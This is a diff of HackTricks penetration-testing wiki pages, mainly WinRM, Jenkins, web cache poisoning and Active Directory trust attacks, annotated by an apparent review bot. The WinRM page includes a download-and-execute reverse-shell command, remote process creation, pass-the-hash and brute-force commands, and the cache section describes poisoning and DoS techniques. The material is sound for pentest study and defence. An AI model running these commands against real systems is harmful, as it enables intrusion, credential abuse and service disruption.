GitBook: [#3340] No subject
BIN
.gitbook/assets/image (157) (1).png
Normal file
After Width: | Height: | Size: 142 KiB |
Before Width: | Height: | Size: 142 KiB After Width: | Height: | Size: 36 KiB |
BIN
.gitbook/assets/image (159) (1).png
Normal file
After Width: | Height: | Size: 32 KiB |
Before Width: | Height: | Size: 32 KiB After Width: | Height: | Size: 19 KiB |
BIN
.gitbook/assets/image (163) (1).png
Normal file
After Width: | Height: | Size: 73 KiB |
Before Width: | Height: | Size: 73 KiB After Width: | Height: | Size: 19 KiB |
BIN
.gitbook/assets/image (166) (1).png
Normal file
After Width: | Height: | Size: 409 KiB |
Before Width: | Height: | Size: 409 KiB After Width: | Height: | Size: 230 KiB |
BIN
.gitbook/assets/image (167) (1).png
Normal file
After Width: | Height: | Size: 56 KiB |
Before Width: | Height: | Size: 56 KiB After Width: | Height: | Size: 24 KiB |
BIN
.gitbook/assets/image (171) (1).png
Normal file
After Width: | Height: | Size: 53 KiB |
Before Width: | Height: | Size: 53 KiB After Width: | Height: | Size: 72 KiB |
BIN
.gitbook/assets/image (175) (1).png
Normal file
After Width: | Height: | Size: 31 KiB |
Before Width: | Height: | Size: 31 KiB After Width: | Height: | Size: 21 KiB |
BIN
.gitbook/assets/image (180) (1).png
Normal file
After Width: | Height: | Size: 20 KiB |
Before Width: | Height: | Size: 20 KiB After Width: | Height: | Size: 55 KiB |
|
@ -16,13 +16,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (307).png" alt="" data-size="original">
|
||||
|
||||
Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
|
||||
|
||||
{% embed url="https://securityhubs.io/" %}
|
||||
{% endhint %}
|
||||
|
||||
## Basic Information
|
||||
|
||||
|
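Review bot: the sponsor hint block inserted here (`{% hint style="danger" %}` … `{% embed url="https://securityhubs.io/" %}` … `{% endhint %}`) is repeated verbatim two more times in the same file, in the hunks starting at `-86,13` and `-205,13`; keeping one copy, or at most one at the head and one at the foot, would stop the page body from being interrupted between `## Basic Information` and `## Code Execution` with marketing text that belongs to no technique.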
@ -86,13 +84,11 @@ Use [this script](https://github.com/gquere/pwn\_jenkins/blob/master/offline\_de
|
|||
println(hudson.util.Secret.decrypt("{...}"))
|
||||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (307).png" alt="" data-size="original">
|
||||
|
||||
Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
|
||||
|
||||
{% embed url="https://securityhubs.io/" %}
|
||||
{% endhint %}
|
||||
|
||||
## Code Execution
|
||||
|
||||
|
@ -112,7 +108,7 @@ Or **try to access to the path \_/configure**\_ in each project (example: /_me/m
|
|||
|
||||
If you are allowed to configure the project you can **make it execute commands when a build is successful**:
|
||||
|
||||
![](<../.gitbook/assets/image (159).png>)
|
||||
![](<../.gitbook/assets/image (159) (1).png>)
|
||||
|
||||
Click on **Save** and **build** the project and your **command will be executed**.\
|
||||
If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**.
|
||||
|
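Review bot: the reference switch from `image (159).png` to `image (159) (1).png` needs a visual check rather than a blind merge: the binary listing at the top shows `image (159) (1).png` added as a 32 KiB file while the same asset number goes 32 KiB → 19 KiB, i.e. the old Jenkins build-step screenshot was moved aside and the number reused for a new image (the Rack code screenshot the cache-poisoning page embeds as `image (159).png` later in this commit). The updated link is the correct one, and the same pattern applies to (157), (163), (166), (167), (171) and (175) in the other files, so each of those pages should be spot-checked for the right screenshot after the sync.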
@ -205,13 +201,11 @@ grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
|
|||
* [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/)
|
||||
* [https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password](https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password)
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (307).png" alt="" data-size="original">
|
||||
|
||||
Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
|
||||
|
||||
{% embed url="https://securityhubs.io/" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# 5985,5986 - Pentesting WinRM
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
|
||||
[https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/)
|
||||
|
||||
# WinRM
|
||||
## WinRM
|
||||
|
||||
[Windows Remote Management](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) (WinRM) is a Microsoft protocol that **allows remote management of Windows machines** over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI.
|
||||
|
||||
|
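Review bot: the demotion to `## WinRM` is fine, but the context line `On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI` is misleading and worth fixing while the section is touched: WinRM is Microsoft's implementation of WS-Management (SOAP over HTTP/HTTPS on 5985/5986); WMI is one thing reachable through it, and PowerShell remoting runs the PSRP protocol on top of it, which is what the `Invoke-Command` and `Enter-PSSession` examples below actually use.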
@ -32,7 +31,7 @@ The easiest way to detect whether WinRM is available is by seeing if the port is
|
|||
|
||||
If one of these ports is open, WinRM is configured and you can try entering a remote session.
|
||||
|
||||
# **Initiating WinRM Session**.
|
||||
## **Initiating WinRM Session**.
|
||||
|
||||
We can configure PowerShell to work with WinRM. According to Microsoft documentation, Enable-PSRemoting is a cmdlet that configures the computer to receive PowerShell remote commands. If we have access to an elevated PowerShell prompt on the victim, we cam enable it and add any "attackers" as trusted hosts. We can run the following two commands:
|
||||
|
||||
|
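Review bot: the retagged heading `## **Initiating WinRM Session**.` keeps the stray trailing period, and the context line still reads `we cam enable it and add any "attackers" as trusted hosts`; both are one-character fixes while this hunk is open.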
@ -43,13 +42,13 @@ Set-Item wsman:\localhost\client\trustedhosts *
|
|||
|
||||
This adds a wildcard to the trustedhosts setting. Be wary of what that entails. _Note: I also had to change the network type on my attack machine from "Public" to "Work" network._
|
||||
|
||||
You can also **activate** WinRM **remotely** _**\_using \_wmic_:
|
||||
You can also **activate** WinRM **remotely** _\*\*\_using \_wmic_:
|
||||
|
||||
```
|
||||
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
|
||||
```
|
||||
|
||||
## Test if configured
|
||||
### Test if configured
|
||||
|
||||
Once the attack machine is configured, use the `Test-WSMan` function to test whether the target is configured for WinRM. You should see some information returned about the protocol version and wsmid:
|
||||
|
||||
|
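Review bot: the escaping change from `_**\_using \_wmic_` to `_\*\*\_using \_wmic_` makes the rendering worse, not better: the line now shows literal asterisks and backslashes. It should simply read `using _wmic_`. Two caveats belong next to the `wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"` example: `Set-Item wsman:\localhost\client\trustedhosts *` on the attacker side disables host verification for every outbound WinRM session (credentials will be sent to any host that answers on that name), and `wmic` is deprecated and absent from recent Windows 11 builds, so the same remote process creation may have to be done with `Invoke-CimMethod -ClassName Win32_Process -MethodName Create` instead.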
@ -59,7 +58,7 @@ Once the attack machine is configured, use the `Test-WSMan` function to test whe
|
|||
|
||||
In this case the first one is configured and the second isn't.
|
||||
|
||||
## Execute a command
|
||||
### Execute a command
|
||||
|
||||
Now we can use PowerShell's `Invoke-Command` to remotely execute a command on the target over WinRM. To remotely run `ipconfig` and see the output:
|
||||
|
||||
|
@ -67,7 +66,7 @@ Now we can use PowerShell's `Invoke-Command` to remotely execute a command on th
|
|||
Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]
|
||||
```
|
||||
|
||||
![](<../.gitbook/assets/image (163).png>)
|
||||
![](<../.gitbook/assets/image (163) (1).png>)
|
||||
|
||||
You can also **execute a command of your current PS console via** _**Invoke-Command**_. Suppose that you have locally a function called _**enumeration**_ and you want to **execute it in a remote computer**, you can do:
|
||||
|
||||
|
@ -75,19 +74,19 @@ You can also **execute a command of your current PS console via** _**Invoke-Comm
|
|||
Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]
|
||||
```
|
||||
|
||||
## Execute a Script
|
||||
### Execute a Script
|
||||
|
||||
```ruby
|
||||
Invoke-Command -ComputerName <computername> -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]
|
||||
```
|
||||
|
||||
## Get reverse-shell
|
||||
### Get reverse-shell
|
||||
|
||||
```ruby
|
||||
Invoke-Command -ComputerName <computername> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}
|
||||
```
|
||||
|
||||
## Get a PS session
|
||||
### Get a PS session
|
||||
|
||||
Or, if you want to drop right into an interactive PowerShell session, use the `Enter-PSSession` function:
|
||||
|
||||
|
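Review bot: the fences under `### Execute a Script` and `### Get reverse-shell` are tagged ```ruby but contain PowerShell (`Invoke-Command -ComputerName <computername> -FilePath C:\path\to\script\file` and the `-ScriptBlock {cmd /c "powershell -ep bypass iex ..."}` line); since this hunk already retags the headings, change them to ```powershell so highlighting matches, and do the same for the evil-winrm fences further down, where `gem install evil-winrm` is a shell command. The `[-credential CSCOU\jarrieta]` placeholder is a leftover from a specific lab; `[-Credential DOMAIN\username]`, as used in the earlier `Invoke-Command` example, is clearer.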
@ -99,7 +98,7 @@ Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Creden
|
|||
|
||||
**The session will run in a new process (wsmprovhost) inside the "victim"**
|
||||
|
||||
## **Forcing WinRM Open**
|
||||
### **Forcing WinRM Open**
|
||||
|
||||
If you really want to use PS Remoting and WinRM but the target isn't configured for it, you could "force" it on through a single command. I wouldn't recommend this but if you really wanted to use WinRM or PSRemoting than by all means do it this way. For example, using PSExec:
|
||||
|
||||
|
@ -109,7 +108,7 @@ PS C:\tools\SysinternalsSuite> .\PsExec.exe \\computername -u domain\username -p
|
|||
|
||||
Now we can enter a remote PS session on the victim.
|
||||
|
||||
## Saving and Restoring sessions
|
||||
### Saving and Restoring sessions
|
||||
|
||||
This **won't work** if the the **language** is **constrained** in the remote computer.
|
||||
|
||||
|
@ -126,7 +125,7 @@ Inside this sessions you can load PS scripts using _Invoke-Command_
|
|||
Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1
|
||||
```
|
||||
|
||||
## Errors
|
||||
### Errors
|
||||
|
||||
If you find the following error:
|
||||
|
||||
|
@ -139,9 +138,9 @@ winrm quickconfig
|
|||
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
|
||||
```
|
||||
|
||||
# WinRM connection in linux
|
||||
## WinRM connection in linux
|
||||
|
||||
## Brute Force
|
||||
### Brute Force
|
||||
|
||||
Be careful, brute-forcing winrm could block users.
|
||||
|
||||
|
@ -157,7 +156,7 @@ crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionT
|
|||
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm
|
||||
```
|
||||
|
||||
## Using evil-winrm
|
||||
### Using evil-winrm
|
||||
|
||||
```ruby
|
||||
gem install evil-winrm
|
||||
|
@ -171,7 +170,7 @@ evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' -i <IP>/<Domain>
|
|||
|
||||
To use evil-winrm to connect to an **IPv6 address** create an entry inside _**/etc/hosts**_ setting a **domain name** to the IPv6 address and connect to that domain.
|
||||
|
||||
## Pass the hash with evil-winrm
|
||||
### Pass the hash with evil-winrm
|
||||
|
||||
```ruby
|
||||
evil-winrm -u <username> -H <Hash> -i <IP>
|
||||
|
@ -179,7 +178,7 @@ evil-winrm -u <username> -H <Hash> -i <IP>
|
|||
|
||||
![](<../.gitbook/assets/image (173).png>)
|
||||
|
||||
## Using a PS-docker machine
|
||||
### Using a PS-docker machine
|
||||
|
||||
```
|
||||
docker run -it quickbreach/powershell-ntlm
|
||||
|
@ -187,9 +186,9 @@ $creds = Get-Credential
|
|||
Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds
|
||||
```
|
||||
|
||||
## Using a ruby script
|
||||
### Using a ruby script
|
||||
|
||||
Code extracted from here: [https://alamot.github.io/winrm_shell/](https://alamot.github.io/winrm_shell/)
|
||||
Code extracted from here: [https://alamot.github.io/winrm\_shell/](https://alamot.github.io/winrm\_shell/)
|
||||
|
||||
```ruby
|
||||
require 'winrm-fs'
|
||||
|
@ -244,11 +243,11 @@ conn.shell(:powershell) do |shell|
|
|||
end
|
||||
```
|
||||
|
||||
# Shodan
|
||||
## Shodan
|
||||
|
||||
* `port:5985 Microsoft-HTTPAPI`
|
||||
|
||||
# HackTricks Automatic Commands
|
||||
## HackTricks Automatic Commands
|
||||
|
||||
```
|
||||
Protocol_Name: WinRM #Protocol Abbreviation if there is one.
|
||||
|
@ -287,7 +286,6 @@ Entry_2:
|
|||
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}
|
||||
```
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
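Review bot: `Entry_2` of the `HackTricks Automatic Commands` block runs `hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}` under `Protocol_Name: WinRM`; that targets RDP, not WinRM, and hydra has no WinRM module. Either drop the entry or replace it with the `crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> ...` form shown earlier on this page, and carry the `Be careful, brute-forcing winrm could block users` lockout warning from the `Brute Force` section into the entry.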
@ -303,5 +301,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -16,13 +16,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (307).png" alt="" data-size="original">
|
||||
|
||||
Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
|
||||
|
||||
{% embed url="https://securityhubs.io/" %}
|
||||
{% endhint %}
|
||||
|
||||
## The difference
|
||||
|
||||
|
@ -60,7 +58,7 @@ One more header related to the cache is **`Age`**. It defines the times in secon
|
|||
|
||||
When caching a request, be **careful with the headers you use** because some of them could be **used unexpectedly** as **keyed** and the **victim will need to use that same header**. Always **test** a Cache Poisoning with **different browsers** to check if it's working.
|
||||
|
||||
## Examples
|
||||
## Exploiting Examples
|
||||
|
||||
### Easiest example
|
||||
|
||||
|
@ -127,6 +125,74 @@ Through Security Skills as a Service, we help organizations to **defend against
|
|||
{% embed url="https://securityhubs.io/" %}
|
||||
{% endhint %}
|
||||
|
||||
## Vulnerable Examples
|
||||
|
||||
### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577))
|
||||
|
||||
ATS forwarded the fragment inside the URL without stripping it and generated the cache key only using the host, path and query (ignoring the fragment). So the request `/#/../?r=javascript:alert(1)` was sent to the backend as `/#/../?r=javascript:alert(1)` and the cache key did't have the payload inside of it, only host, path and query.
|
||||
|
||||
### GitHub CP-DoS
|
||||
|
||||
Sending a bad value in the content-type header triggered a 405 response that was cached. The cache key contained the cookie so it was possible only to attack unauth users.
|
||||
|
||||
### GitLab + GCP CP-DoS
|
||||
|
||||
GitLab uses GCP buckets to store static content. **GCP Buckets** support the **header `x-http-method-override`**. So it was possible to send the header `x-http-method-override: HEAD` and poison the cache into returning an empty response body. It could also support the method `PURGE`.
|
||||
|
||||
### Rack Middleware (Ruby on rails)
|
||||
|
||||
Ruby on Rails applications are often deployed alongside the Rack middleware. The Rack code below takes the value of the **`x-forwarded-scheme` value and uses it as the scheme of the request**.
|
||||
|
||||
![](<../.gitbook/assets/image (159).png>)
|
||||
|
||||
Sending the `x-forwarded-scheme: http` header would result into a 301 redirect to the same location which will cause a DoS over that resource as in this example:
|
||||
|
||||
![](<../.gitbook/assets/image (166).png>)
|
||||
|
||||
The application might also support the header `X-forwarded-host` and redirect the user to that host, making possible to load javascripts files from the attacker server:
|
||||
|
||||
![](<../.gitbook/assets/image (157).png>)
|
||||
|
||||
### 403 and Storage Buckets
|
||||
|
||||
**Cloudflare** used to **cache** the **403 responses**, therefore sending **bad Authorization** headers trying to access **S3** or **Azure Storage Blobs** exposed will return a 403 that will be cached. Cloudflare no longer caches 403 responses but this might work with other proxies.
|
||||
|
||||
![](<../.gitbook/assets/image (171).png>)
|
||||
|
||||
### Injecting Keyed Parameters
|
||||
|
||||
Quite often, caches are configured to **only include specific GET parameters in the cache key**.
|
||||
|
||||
For example, Fastly using Varnish **cached the `size` parameter** in the request but if you sent **also** the **`siz%65`** parameter with a bad value, the **cache key** was constructed with the **well written size param**, but the **backend** used the **value inside the URL encoded param**.
|
||||
|
||||
![](<../.gitbook/assets/image (180).png>)
|
||||
|
||||
URL encoding the second `size` parameter caused it to be ignored by the cache, but used by the backend. Giving the parameter a value of 0 would result in a cacheable 400 Bad Request.
|
||||
|
||||
### User Agent Rules
|
||||
|
||||
Due to the high amount of traffic tools like FFUF or Nuclei generate, some developers decided to block reqeusts matching their user-agents. Ironically, these tweaks can introduce unwanted cache poisoning DoS opportunities.
|
||||
|
||||
![](<../.gitbook/assets/image (167).png>)
|
||||
|
||||
I found this worked on multiple targets, with user-agents from different tools or scanners.
|
||||
|
||||
### Illegal Header Fields
|
||||
|
||||
The header name format is defined in [RFC7230](https://datatracker.ietf.mrg/doc/html/rfc7230) as follows:
|
||||
|
||||
![](<../.gitbook/assets/image (175).png>)
|
||||
|
||||
In theory, if a header name contains characters other than the ones listed in **tchar** it should be rejected with a 400 Bad request. In practice however, servers don't always respect the RFC. The easiest way to exploit this nuance, was by targeting Akamai which doesn't reject invalid headers, but forwards them and caches any 400 error as long the cache-control header is not present.
|
||||
|
||||
![](<../.gitbook/assets/image (163).png>)
|
||||
|
||||
Sending a header containing an illegal character, `\` would cause a cacheable 400 Bad Request error. This was one of the most commonly identified patterns throughout my testing.
|
||||
|
||||
### Finding new headers
|
||||
|
||||
[https://gist.github.com/iustin24/92a5ba76ee436c85716f003dda8eecc6](https://gist.github.com/iustin24/92a5ba76ee436c85716f003dda8eecc6)
|
||||
|
||||
## Cache Deception
|
||||
|
||||
The goal of Cache Deception is to make clients **load resources that are going to be saved by the cache with their sensitive information**.
|
||||
|
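Review bot: the link `https://datatracker.ietf.mrg/doc/html/rfc7230` under `### Illegal Header Fields` is broken (`.mrg` should be `.org`). The new `Vulnerable Examples` section is written in the first person (`I found this worked on multiple targets`, `throughout my testing`) and follows the structure of the `youst.in/posts/cache-poisoning-at-scale/` post listed in the references below; either mark it as that author's text with attribution at the top of the section or rewrite it in the page's own voice. Smaller fixes: `did't` → `didn't`, `reqeusts` → `requests`, and `only to attack unauth users` → `unauthenticated users`. One asset question: the section embeds `image (180).png`, and the binary listing shows `image (180) (1).png` added (20 KiB) alongside a 20 KiB → 55 KiB rewrite of that number, but no hunk in this diff updates any page to the `(1)` name, so whichever page previously embedded `image (180).png` now displays the Fastly `size`/`siz%65` screenshot instead.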
@ -146,14 +212,13 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S
|
|||
* [https://portswigger.net/web-security/web-cache-poisoning](https://portswigger.net/web-security/web-cache-poisoning)
|
||||
* [https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities](https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities)
|
||||
* [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712)
|
||||
* [https://youst.in/posts/cache-poisoning-at-scale/](https://youst.in/posts/cache-poisoning-at-scale/)
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (307).png" alt="" data-size="original">
|
||||
|
||||
Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
|
||||
|
||||
{% embed url="https://securityhubs.io/" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -56,7 +56,7 @@ Imagine a web page that is using the character `'` to create SQL queries with th
|
|||
|
||||
Then, a malicious user could insert a different Unicode character equivalent to `' (0x27)` like `%ef%bc%87` , when the input gets normalised, a single quote is created and a **SQLInjection vulnerability** appears:
|
||||
|
||||
![](<../.gitbook/assets/image (157).png>)
|
||||
![](<../.gitbook/assets/image (157) (1).png>)
|
||||
|
||||
**Some interesting Unicode characters**
|
||||
|
||||
|
|
|
@ -285,7 +285,7 @@ When **2 domains trust each other they exchange keys**, these **keys** are going
|
|||
|
||||
When a **user** tries to **access** a **service** on the **trusting domain** it will request an **inter-realm TGT** to the DC of its domain. The DC wills serve the client this **TGT** which would be **encrypted/signed** with the **inter-realm** **key** (the key both domains **exchanged**). Then, the **client** will **access** the **DC of the other domain** and will **request** a **TGS** for the service using the **inter-realm TGT**. The **DC** of the trusting domain will **check** the **key** used, if it's ok, it will **trust everything in that ticket** and will serve the TGS to the client.
|
||||
|
||||
![](<../../.gitbook/assets/image (166).png>)
|
||||
![](<../../.gitbook/assets/image (166) (1).png>)
|
||||
|
||||
### Different trusts
|
||||
|
||||
|
@ -359,13 +359,15 @@ schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
|
|||
```
|
||||
|
||||
#### Exploit writeable Configration NC
|
||||
|
||||
The Configuration NC is the primary repository for configuration information for a forest and is replicated to every DC in the forest. Additionally, every writable DC (not read-only DCs) in the forest holds a writable copy of the Configuration NC. Exploiting this require running as SYSTEM on a (child) DC.
|
||||
|
||||
It is possible to compromise the root domain in various ways. Examples:
|
||||
- [Link GPO to to root DC site](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research)
|
||||
- [Compromise gMSA](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent)
|
||||
- [Schema attack](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent)
|
||||
- Exploit ADCS - Create/modify certificate template to allow authentication as any user (e.g. Enterprise Admins)
|
||||
|
||||
* [Link GPO to to root DC site](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research)
|
||||
* [Compromise gMSA](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent)
|
||||
* [Schema attack](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent)
|
||||
* Exploit ADCS - Create/modify certificate template to allow authentication as any user (e.g. Enterprise Admins)
|
||||
|
||||
### External Forest Domain Privilege escalation
|
||||
|
||||
|
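Review bot: while switching the list markers from `-` to `*`, fix the surrounding context lines too: the heading `#### Exploit writeable Configration NC` (`Configuration`), `Exploiting this require running as SYSTEM` (`requires`), and the duplicated `Link GPO to to root DC site` in the first item. The last item, `Exploit ADCS - Create/modify certificate template to allow authentication as any user`, is the only one without a source link; the other three point to the improsec series, so a link to the corresponding part (or to the page's own ADCS section) would keep the list consistent.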
@ -376,11 +378,12 @@ Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<current
|
|||
```
|
||||
|
||||
### Attack one-way trusted domain/forest (Trust account attack)
|
||||
|
||||
In short, if an attacker has administrative access to FORESTB which trusts FORESTA, the attacker can obtain the credentials for a _trust account_ located in FORESTA. This account is a member of Domain Users in FORESTA through its Primary Group. As we see too often, Domain Users membership is all that is necessary to identify and use other techniques and attack paths to become Domain Admin.
|
||||
|
||||
![](<https://images.squarespace-cdn.com/content/v1/5bbb4a7301232c6e6c8757fa/61a0233f-edd8-40b6-b6ae-8592a29875bd/Picture3.png>)
|
||||
![](https://images.squarespace-cdn.com/content/v1/5bbb4a7301232c6e6c8757fa/61a0233f-edd8-40b6-b6ae-8592a29875bd/Picture3.png)
|
||||
|
||||
This technique is not limited to forest trust but works over any domain/forest one-way trust in the direction trusting -> trusted.
|
||||
This technique is not limited to forest trust but works over any domain/forest one-way trust in the direction trusting -> trusted.
|
||||
|
||||
The trust protections (SID filtering, disabled SID history, and disabled TGT delegation) do not mitigate the technique.
|
||||
|
||||
|
|
|
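Review bot: the unwrapped image link `![](https://images.squarespace-cdn.com/content/v1/5bbb4a7301232c6e6c8757fa/.../Picture3.png)` hot-links a figure from an external blog, and the paragraph around it (`As we see too often, Domain Users membership is all that is necessary to identify and use other techniques`) reads as that post's text; add the source URL for the `Trust account attack` section the way the three improsec links above do, and consider copying the image into `.gitbook/assets` so the page does not break if the CDN path changes. The two identical lines `This technique is not limited to forest trust but works over any domain/forest one-way trust in the direction trusting -> trusted.` indicate only trailing whitespace changed there.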
@ -1,4 +1,4 @@
|
|||
|
||||
# BloodHound
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
|
||||
# What is BloodHound
|
||||
## What is BloodHound
|
||||
|
||||
> BloodHound is a single page Javascript web application, built on top of [Linkurious](http://linkurio.us), compiled with [Electron](http://electron.atom.io), with a [Neo4j](https://neo4j.com)database fed by a PowerShell ingestor.
|
||||
>
|
||||
|
@ -35,9 +34,9 @@ The **ingestors** are used to **enumerate the domain and extract all the informa
|
|||
|
||||
The **visualisation application uses neo4j** to show how all the information is related and to show different ways to escalate privileges in the domain.
|
||||
|
||||
# Installation
|
||||
## Installation
|
||||
|
||||
1. Bloodhound
|
||||
1. Bloodhound
|
||||
|
||||
To install the visualisation application you will need to install **neo4j** and the **bloodhound application**.\
|
||||
The easiest way to do this is just doing:
|
||||
|
@ -45,28 +44,30 @@ The easiest way to do this is just doing:
|
|||
```
|
||||
apt-get install bloodhound
|
||||
```
|
||||
|
||||
You can **download the community version of neo4j** from [here](https://neo4j.com/download-center/#community).
|
||||
|
||||
2. Ingestors
|
||||
1. Ingestors
|
||||
|
||||
You can download the Ingestors from:
|
||||
- https://github.com/BloodHoundAD/SharpHound/releases
|
||||
- https://github.com/BloodHoundAD/BloodHound/releases
|
||||
- https://github.com/fox-it/BloodHound.py
|
||||
|
||||
3. Learn the path from the graph
|
||||
* https://github.com/BloodHoundAD/SharpHound/releases
|
||||
* https://github.com/BloodHoundAD/BloodHound/releases
|
||||
* https://github.com/fox-it/BloodHound.py
|
||||
|
||||
Bloodhound come with various queries to highlight sensitive compromission path.
|
||||
It it possible to add custom queries to enhance the search and correlation between objects and more!
|
||||
1. Learn the path from the graph
|
||||
|
||||
Bloodhound come with various queries to highlight sensitive compromission path. It it possible to add custom queries to enhance the search and correlation between objects and more!
|
||||
|
||||
This repo has a nice collections of queries: https://github.com/CompassSecurity/BloodHoundQueries
|
||||
|
||||
<u>Installation process</u>:
|
||||
```sh
|
||||
Installation process:
|
||||
|
||||
```
|
||||
$ curl -o "~/.config/bloodhound/customqueries.json" "https://raw.githubusercontent.com/CompassSecurity/BloodHoundQueries/master/customqueries.json"
|
||||
```
|
||||
|
||||
# Visualisation app Execution
|
||||
## Visualisation app Execution
|
||||
|
||||
After downloading/installing the required applications, lets start them.\
|
||||
First of all you need to **start the neo4j database**:
|
||||
|
